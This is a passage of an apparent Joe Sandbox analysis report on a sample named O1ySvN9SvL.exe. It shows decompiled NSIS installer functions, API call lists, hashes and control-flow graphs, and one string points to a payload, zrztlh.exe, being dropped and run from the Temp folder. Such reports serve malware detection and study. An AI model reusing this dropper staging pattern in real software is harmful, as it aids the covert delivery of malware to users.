                • GetClassInfoA.USER32 ref: 004038E7
                • RegisterClassA.USER32 ref: 004038F0
                • DialogBoxParamA.USER32 ref: 0040390F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                • API String ID: 914957316-2084434793
                • Opcode ID: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                • Instruction ID: 396c3099e5e99d0af67321f2f40d51cf7d39f14f72ddbb9a737c40d3af2db82b
                • Opcode Fuzzy Hash: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                • Instruction Fuzzy Hash: 5261C6B1704200BBD620AF61AD45F3B3ABDEB4474AB50447FF941B22E1D77CA9458A3E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 276 402c7d-402ccc GetTickCount GetModuleFileNameA call 4057cb 279 402cd8-402d06 call 405af4 call 40562e call 405af4 GetFileSize 276->279 280 402cce-402cd3 276->280 288 402e45-402e4b 279->288 289 402d0c-402d23 279->289 281 402f6a-402f6e 280->281 290 402e51-402e54 288->290 291 402f22-402f27 288->291 292 402d25 289->292 293 402d27-402d2d call 40327d 289->293 294 402e80-402ecc GlobalAlloc call 405eb4 call 4057fa CreateFileA 290->294 295 402e56-402e6e call 4032af call 40327d 290->295 291->281 292->293 298 402d32-402d34 293->298 320 402ee8-402f18 call 4032af call 402f71 294->320 321 402ece-402ed3 294->321 295->291 316 402e74-402e7a 295->316 301 402ed8-402edb 298->301 302 402d3a-402d40 298->302 301->291 308 402edd-402ee6 DestroyWindow 301->308 305 402dd4-402dd8 302->305 306 402d46-402d5e call 40578c 302->306 309 402dda-402ddd 305->309 310 402e0e-402e14 305->310 306->310 325 402d64-402d6b 306->325 308->291 314 402de7-402df0 GetTickCount 309->314 315 402ddf-402de5 call 405e13 309->315 318 402e16-402e24 call 405e46 310->318 319 402e27-402e31 310->319 314->310 324 402df2-402e0b CreateDialogParamA 314->324 315->310 316->291 316->294 318->319 319->289 327 402e37-402e3a 319->327 335 402f1d-402f20 320->335 321->281 324->310 325->310 330 402d71-402d78 325->330 327->288 332 402e3c-402e3f DestroyWindow 327->332 330->310 334 402d7e-402d85 330->334 332->288 334->310 336 402d8b-402d92 334->336 335->291 337 402f29-402f3a 335->337 336->310 338 402d94-402db4 336->338 339 402f42-402f47 337->339 340 402f3c 337->340 338->291 341 402dba-402dbe 338->341 342 402f48-402f4e 339->342 340->339 343 402dc0-402dc4 341->343 344 402dc6-402dce 341->344 342->342 346 402f50-402f68 call 40578c 342->346 343->327 343->344 344->310 345 402dd0-402dd2 344->345 345->310 346->281
                C-Code - Quality: 96%
                			E00402C7D(void* __eflags, signed int _a4) {
                				struct HWND__* _v8;
                				struct HWND__* _v12;
                				struct HWND__* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				long _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				signed int _v48;
                				char _v308;
                				signed int _t63;
                				void* _t65;
                				void* _t70;
                				signed int _t71;
                				intOrPtr _t73;
                				void* _t76;
                				intOrPtr* _t78;
                				intOrPtr _t79;
                				signed int _t85;
                				signed int _t87;
                				signed int _t90;
                				signed int _t91;
                				long _t95;
                				signed int _t100;
                				intOrPtr _t103;
                				signed int _t111;
                				signed int _t112;
                				void* _t113;
                				signed int _t114;
                				signed int _t117;
                				void* _t118;
                
                				_v8 = 0;
                				_v20 = GetTickCount() + 0x3e8;
                				_v12 = 0;
                				_v16 = 0;
                				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe", 0x400);
                				_t113 = E004057CB("C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe", 0x80000000, 3);
                				 *0x409020 = _t113;
                				if(_t113 == 0xffffffff) {
                					return "Error launching installer";
                				}
                				E00405AF4("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe");
                				E00405AF4(0x42b000, E0040562E("C:\\Users\\alfons\\Desktop"));
                				_t63 = GetFileSize(_t113, 0);
                				__eflags = _t63;
                				 *0x41f0e0 = _t63;
                				_t117 = _t63;
                				if(_t63 <= 0) {
                					L27:
                					__eflags =  *0x423f2c; // 0x7e00
                					if(__eflags == 0) {
                						goto L36;
                					}
                					__eflags = _v16;
                					if(_v16 == 0) {
                						L31:
                						_t65 = GlobalAlloc(0x40, _v28); // executed
                						_t118 = _t65;
                						E00405EB4(0x40b008);
                						E004057FA( &_v308, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
                						_t70 = CreateFileA( &_v308, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                						__eflags = _t70 - 0xffffffff;
                						 *0x409024 = _t70;
                						if(_t70 != 0xffffffff) {
                							_t71 =  *0x423f2c; // 0x7e00
                							_t73 = E004032AF(_t71 + 0x1c);
                							 *0x41f0e4 = _t73;
                							 *0x4170d8 = _t73 - ( !_v48 & 0x00000004) + _v24 - 0x1c; // executed
                							_t76 = E00402F71(_v24, 0xffffffff, 0, _t118, _v28); // executed
                							__eflags = _t76 - _v28;
                							if(_t76 == _v28) {
                								__eflags = _v48 & 0x00000001;
                								 *0x423f28 = _t118;
                								 *0x423f30 =  *_t118;
                								if((_v48 & 0x00000001) != 0) {
                									 *0x423f34 =  *0x423f34 + 1;
                									__eflags =  *0x423f34;
                								}
                								_t54 = _t118 + 0x44; // 0x44
                								_t78 = _t54;
                								_t111 = 8;
                								do {
                									_t78 = _t78 - 8;
                									 *_t78 =  *_t78 + _t118;
                									_t111 = _t111 - 1;
                									__eflags = _t111;
                								} while (_t111 != 0);
                								_t79 =  *0x4170d4; // 0x604ca
                								 *((intOrPtr*)(_t118 + 0x3c)) = _t79;
                								E0040578C(0x423f40, _t118 + 4, 0x40);
                								__eflags = 0;
                								return 0;
                							}
                							goto L36;
                						}
                						return "Error writing temporary file. Make sure your temp folder is valid.";
                					}
                					E004032AF( *0x4170d0);
                					_t85 = E0040327D( &_a4, 4);
                					__eflags = _t85;
                					if(_t85 == 0) {
                						goto L36;
                					}
                					__eflags = _v12 - _a4;
                					if(_v12 != _a4) {
                						goto L36;
                					}
                					goto L31;
                				} else {
                					do {
                						_t87 =  *0x423f2c; // 0x7e00
                						_t114 = _t117;
                						asm("sbb eax, eax");
                						_t90 = ( ~_t87 & 0x00007e00) + 0x200;
                						__eflags = _t117 - _t90;
                						if(_t117 >= _t90) {
                							_t114 = _t90;
                						}
                						_t91 = E0040327D(0x4170e0, _t114); // executed
                						__eflags = _t91;
                						if(_t91 == 0) {
                							__eflags = _v8;
                							if(_v8 != 0) {
                								DestroyWindow(_v8);
                							}
                							L36:
                							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                						}
                						__eflags =  *0x423f2c; // 0x7e00
                						if(__eflags != 0) {
                							__eflags = _a4 & 0x00000002;
                							if((_a4 & 0x00000002) == 0) {
                								__eflags = _v8;
                								if(_v8 == 0) {
                									_t95 = GetTickCount();
                									__eflags = _t95 - _v20;
                									if(_t95 > _v20) {
                										_v8 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, "verifying installer: %d%%");
                									}
                								} else {
                									E00405E13(0);
                								}
                							}
                							goto L22;
                						}
                						E0040578C( &_v48, 0x4170e0, 0x1c);
                						_t100 = _v48;
                						__eflags = _t100 & 0xfffffff0;
                						if((_t100 & 0xfffffff0) != 0) {
                							goto L22;
                						}
                						__eflags = _v44 - 0xdeadbeef;
                						if(_v44 != 0xdeadbeef) {
                							goto L22;
                						}
                						__eflags = _v32 - 0x74736e49;
                						if(_v32 != 0x74736e49) {
                							goto L22;
                						}
                						__eflags = _v36 - 0x74666f73;
                						if(_v36 != 0x74666f73) {
                							goto L22;
                						}
                						__eflags = _v40 - 0x6c6c754e;
                						if(_v40 != 0x6c6c754e) {
                							goto L22;
                						}
                						_a4 = _a4 | _t100;
                						_t112 =  *0x4170d0; // 0x0
                						 *0x423fc0 =  *0x423fc0 | _a4 & 0x00000002;
                						_t103 = _v24;
                						__eflags = _t103 - _t117;
                						 *0x423f2c = _t112;
                						if(_t103 > _t117) {
                							goto L36;
                						}
                						__eflags = _a4 & 0x00000008;
                						if((_a4 & 0x00000008) != 0) {
                							L15:
                							_v16 = _v16 + 1;
                							_t25 = _t103 - 4; // 0x1c
                							_t117 = _t25;
                							__eflags = _t114 - _t117;
                							if(_t114 > _t117) {
                								_t114 = _t117;
                							}
                							goto L22;
                						}
                						__eflags = _a4 & 0x00000004;
                						if((_a4 & 0x00000004) != 0) {
                							break;
                						}
                						goto L15;
                						L22:
                						__eflags = _t117 -  *0x41f0e0;
                						if(_t117 <  *0x41f0e0) {
                							_v12 = E00405E46(_v12, 0x4170e0, _t114);
                						}
                						 *0x4170d0 =  *0x4170d0 + _t114;
                						_t117 = _t117 - _t114;
                						__eflags = _t117;
                					} while (_t117 > 0);
                					__eflags = _v8;
                					if(_v8 != 0) {
                						DestroyWindow(_v8);
                					}
                					goto L27;
                				}
                			}





































                APIs
                • GetTickCount.KERNEL32 ref: 00402C8E
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\O1ySvN9SvL.exe,00000400), ref: 00402CAE
                  • Part of subcall function 004057CB: GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 004057CF
                  • Part of subcall function 004057CB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O1ySvN9SvL.exe,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 00402CF7
                • DestroyWindow.USER32(?,004170E0,00000000), ref: 00402E3F
                • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E85
                Strings
                • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402F22
                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402ECE
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C7D, 00402E9D
                • "C:\Users\user\Desktop\O1ySvN9SvL.exe" , xrefs: 00402C8A
                • C:\Users\user\Desktop, xrefs: 00402CD9, 00402CDE, 00402CE4
                • Inst, xrefs: 00402D71
                • C:\Users\user\Desktop\O1ySvN9SvL.exe, xrefs: 00402C94, 00402CA3, 00402CBB, 00402CD8
                • soft, xrefs: 00402D7E
                • verifying installer: %d%%, xrefs: 00402DF2
                • Error launching installer, xrefs: 00402CCE
                • Null, xrefs: 00402D8B
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\O1ySvN9SvL.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                • API String ID: 2181728824-3106390566
                • Opcode ID: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                • Instruction ID: db3d77af3dcc15e42867082d874dfbf8a96a36a76704b09f65ca819f11d0ff47
                • Opcode Fuzzy Hash: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                • Instruction Fuzzy Hash: DB81B031E40205ABDB20DFA4DE89A9E7AB4EB08355F14813BF505B62D1C7BC9E41CB9C
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 415 40309c-4030c8 GetTickCount 416 403272 415->416 417 4030ce-4030f3 call 4032af SetFilePointer 415->417 418 403274-40327a 416->418 421 4030f9-40310b 417->421 422 40310d 421->422 423 40310f-40311d call 40327d 421->423 422->423 426 403123-40312f 423->426 427 40323d-403240 423->427 428 403135-40313b 426->428 427->418 429 4031a0-4031c0 call 405ed4 428->429 430 40313d-403143 428->430 436 403246 429->436 437 4031c6-4031d3 429->437 430->429 431 403145-403149 430->431 433 40314b-40316b call 405e13 431->433 434 40316d-403175 GetTickCount 431->434 433->429 434->429 439 403177-40319c CreateDialogParamA 434->439 443 403248-403249 436->443 440 4031d5-4031eb WriteFile 437->440 441 403207-40320d 437->441 439->429 444 403242-403244 440->444 445 4031ed-4031f1 440->445 441->436 446 40320f-403211 441->446 443->418 444->443 445->444 447 4031f3-4031ff 445->447 446->436 448 403213-403226 446->448 447->428 449 403205 447->449 448->421 450 40322c-40323b SetFilePointer 448->450 449->448 451 40324b-403251 450->451 451->416 452 403253-40326c SendMessageA DestroyWindow 451->452 452->416
                C-Code - Quality: 93%
                			E0040309C(intOrPtr _a4) {
                				long _v4;
                				int _v8;
                				struct HWND__* _v12;
                				void* __ecx;
                				long _t10;
                				intOrPtr _t14;
                				long _t15;
                				signed int _t16;
                				void* _t18;
                				void* _t19;
                				long _t21;
                				int _t26;
                				long _t27;
                				signed int _t28;
                				long _t31;
                				long _t38;
                				void* _t45;
                				long _t46;
                				intOrPtr _t48;
                				void* _t50;
                				long _t51;
                				struct HWND__* _t52;
                				intOrPtr _t58;
                				intOrPtr _t59;
                				long _t65;
                
                				_v8 = 0;
                				_t10 = GetTickCount();
                				_t46 =  *0x4170d4; // 0x604ca
                				_t45 = _t10 + 0x1f4;
                				_t48 = _t46 -  *0x40b004 + _a4;
                				if(_t48 <= 0) {
                					L28:
                					return 0;
                				} else {
                					E004032AF( *0x41f0e4);
                					SetFilePointer( *0x409024,  *0x40b004, 0, 0); // executed
                					 *0x41f0e0 = _t48;
                					 *0x4170d0 = 0;
                					do {
                						_t14 =  *0x4170d8; // 0x4904e
                						_t38 = 0x4000;
                						_t15 = _t14 -  *0x41f0e4;
                						if(_t15 <= 0x4000) {
                							_t38 = _t15;
                						}
                						_t16 = E0040327D(0x413090, _t38); // executed
                						if(_t16 == 0) {
                							return _t16 | 0xffffffff;
                						}
                						 *0x41f0e4 =  *0x41f0e4 + _t38;
                						 *0x40b020 = 0x413090;
                						 *0x40b024 = _t38;
                						while(1) {
                							_t58 =  *0x423f28; // 0x74d188
                							if(_t58 != 0) {
                								_t59 =  *0x423fc0; // 0x0
                								if(_t59 == 0) {
                									if(_v8 == 0) {
                										_t27 = GetTickCount();
                										__eflags = _t27 - _t45;
                										if(_t27 > _t45) {
                											_t28 =  *0x423f24; // 0x0
                											asm("sbb eax, eax");
                											_t31 =  !( ~_t28) & "unpacking data: %d%%";
                											__eflags = _t31;
                											_v12 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, _t31);
                										}
                									} else {
                										 *0x4170d0 =  *0x41f0e0 -  *0x4170d4 - _a4 +  *0x40b004;
                										E00405E13(0);
                									}
                								}
                							}
                							 *0x40b028 = 0x40b090;
                							 *0x40b02c = 0x8000; // executed
                							_t18 = E00405ED4(0x40b008); // executed
                							if(_t18 < 0) {
                								break;
                							}
                							_t50 =  *0x40b028; // 0x40cb4a
                							_t51 = _t50 - 0x40b090;
                							if(_t51 == 0) {
                								__eflags =  *0x40b024; // 0x0
                								if(__eflags != 0) {
                									break;
                								}
                								__eflags = _t38;
                								if(_t38 == 0) {
                									break;
                								}
                								goto L20;
                							}
                							_t26 = WriteFile( *0x409024, 0x40b090, _t51,  &_v4, 0); // executed
                							if(_t26 == 0 || _t51 != _v4) {
                								_push(0xfffffffe);
                								L25:
                								_pop(_t19);
                								return _t19;
                							} else {
                								 *0x40b004 =  *0x40b004 + _t51;
                								_t65 =  *0x40b024; // 0x0
                								if(_t65 != 0) {
                									continue;
                								}
                								goto L20;
                							}
                						}
                						_push(0xfffffffd);
                						goto L25;
                						L20:
                						_t21 =  *0x4170d4; // 0x604ca
                					} while (_t21 -  *0x40b004 + _a4 > 0);
                					SetFilePointer( *0x409024, _t21, 0, 0); // executed
                					_t52 = _v8;
                					if(_t52 != 0) {
                						 *0x4170d0 =  *0x41f0e0;
                						SendMessageA(_t52, 0x113, 0, 0);
                						DestroyWindow(_t52);
                					}
                					goto L28;
                				}
                			}





























                APIs
                • GetTickCount.KERNEL32 ref: 004030A8
                  • Part of subcall function 004032AF: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,00007DE4), ref: 004032BD
                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 004030E7
                • GetTickCount.KERNEL32 ref: 0040316D
                • CreateDialogParamA.USER32(0000006F,00000000,00402BCA,00000000), ref: 00403196
                • WriteFile.KERNELBASE(0040B090,0040CB4A,000000FF,00000000,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020), ref: 004031E3
                • SetFilePointer.KERNELBASE(000604CA,00000000,00000000,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020), ref: 00403235
                • SendMessageA.USER32 ref: 00403265
                • DestroyWindow.USER32(00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000), ref: 0040326C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$Pointer$CountTick$CreateDestroyDialogMessageParamSendWindowWrite
                • String ID: tCPInfo
                • API String ID: 131999699-2120998202
                • Opcode ID: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
                • Instruction ID: 533e5dba32bddeac04eb0af6ed3ed2a018518d1e6048d9abc72f3d394191c675
                • Opcode Fuzzy Hash: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
                • Instruction Fuzzy Hash: 3C418B71A043049BD710DF65EE4496B3FBCF709356B11827EF611B22E1C739AA048BAD
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 453 40177f-4017a2 call 402a85 call 405654 458 4017a4-4017aa call 405af4 453->458 459 4017ac-4017be call 405af4 call 4055e7 lstrcatA 453->459 464 4017c3-4017c9 call 405d03 458->464 459->464 469 4017ce-4017d2 464->469 470 4017d4-4017de call 405d9c 469->470 471 401805-401808 469->471 479 4017f0-401802 470->479 480 4017e0-4017ee CompareFileTime 470->480 472 401810-40182c call 4057cb 471->472 473 40180a-40180b call 4057ac 471->473 481 4018a4-4018cd call 404e9f call 402f71 472->481 482 40182e-401831 472->482 473->472 479->471 480->479 496 4018d5-4018e1 SetFileTime 481->496 497 4018cf-4018d3 481->497 483 401833-401875 call 405af4 * 2 call 405b16 call 405af4 call 4053c2 482->483 484 401886-401890 call 404e9f 482->484 483->469 516 40187b-40187c 483->516 494 401899-40189f 484->494 499 402923 494->499 498 4018e7-4018f2 FindCloseChangeNotification 496->498 497->496 497->498 501 4018f8-4018fb 498->501 502 40291a-40291d 498->502 503 402925-402929 499->503 505 401910-401913 call 405b16 501->505 506 4018fd-40190e call 405b16 lstrcatA 501->506 502->499 513 401918-402276 call 4053c2 505->513 506->513 513->503 520 4026bf-4026c6 513->520 516->494 518 40187e-40187f 516->518 518->484 520->502
                C-Code - Quality: 70%
                			E0040177F(FILETIME* __ebx, void* __eflags) {
                				void* _t33;
                				void* _t41;
                				void* _t43;
                				FILETIME* _t49;
                				FILETIME* _t62;
                				void* _t64;
                				signed int _t70;
                				FILETIME* _t71;
                				FILETIME* _t75;
                				signed int _t77;
                				CHAR* _t81;
                				void* _t83;
                				void* _t85;
                
                				_t75 = __ebx;
                				_t81 = E00402A85(0x31);
                				 *(_t85 - 0x3c) = _t81;
                				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                				_t33 = E00405654(_t81);
                				_push(_t81);
                				if(_t33 == 0) {
                					lstrcatA(E004055E7(E00405AF4(0x4093f8, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                				} else {
                					_push(0x4093f8);
                					E00405AF4();
                				}
                				E00405D03(0x4093f8);
                				while(1) {
                					__eflags =  *(_t85 + 8) - 3;
                					if( *(_t85 + 8) >= 3) {
                						_t64 = E00405D9C(0x4093f8);
                						_t77 = 0;
                						__eflags = _t64 - _t75;
                						if(_t64 != _t75) {
                							_t71 = _t64 + 0x14;
                							__eflags = _t71;
                							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                						}
                						asm("sbb eax, eax");
                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                						__eflags = _t70;
                						 *(_t85 + 8) = _t70;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) == _t75) {
                						E004057AC(0x4093f8);
                					}
                					__eflags =  *(_t85 + 8) - 1;
                					_t41 = E004057CB(0x4093f8, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                					__eflags = _t41 - 0xffffffff;
                					 *(_t85 - 8) = _t41;
                					if(_t41 != 0xffffffff) {
                						break;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) != _t75) {
                						E00404E9F(0xffffffe2,  *(_t85 - 0x3c));
                						__eflags =  *(_t85 + 8) - 2;
                						if(__eflags == 0) {
                							 *((intOrPtr*)(_t85 - 4)) = 1;
                						}
                						L31:
                						 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t85 - 4));
                						__eflags =  *0x423fa8;
                						goto L32;
                					} else {
                						E00405AF4(0x409bf8, 0x424000);
                						E00405AF4(0x424000, 0x4093f8);
                						E00405B16(_t75, 0x4093f8, 0x409bf8, "C:\\Users\\alfons\\AppData\\Local\\Temp",  *((intOrPtr*)(_t85 - 0x10)));
                						E00405AF4(0x424000, 0x409bf8);
                						_t62 = E004053C2("C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t85 - 0x24) >> 3) - 4;
                						__eflags = _t62;
                						if(_t62 == 0) {
                							continue;
                						} else {
                							__eflags = _t62 == 1;
                							if(_t62 == 1) {
                								 *0x423fa8 =  &( *0x423fa8->dwLowDateTime);
                								L32:
                								_t49 = 0;
                								__eflags = 0;
                							} else {
                								_push(0x4093f8);
                								_push(0xfffffffa);
                								E00404E9F();
                								L29:
                								_t49 = 0x7fffffff;
                							}
                						}
                					}
                					L33:
                					return _t49;
                				}
                				E00404E9F(0xffffffea,  *(_t85 - 0x3c));
                				 *0x409250 =  *0x409250 + 1;
                				_t43 = E00402F71(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 8), _t75, _t75); // executed
                				 *0x409250 =  *0x409250 - 1;
                				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                				_t83 = _t43;
                				if( *(_t85 - 0x18) != 0xffffffff) {
                					L22:
                					SetFileTime( *(_t85 - 8), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                				} else {
                					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                						goto L22;
                					}
                				}
                				FindCloseChangeNotification( *(_t85 - 8)); // executed
                				__eflags = _t83 - _t75;
                				if(_t83 >= _t75) {
                					goto L31;
                				} else {
                					__eflags = _t83 - 0xfffffffe;
                					if(_t83 != 0xfffffffe) {
                						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffee);
                					} else {
                						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffe9);
                						lstrcatA(0x4093f8,  *(_t85 - 0x3c));
                					}
                					_push(0x200010);
                					_push(0x4093f8);
                					E004053C2();
                					goto L29;
                				}
                				goto L33;
                			}

















                APIs
                • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BE
                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000000,00000000,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017E8
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                  • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                  • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
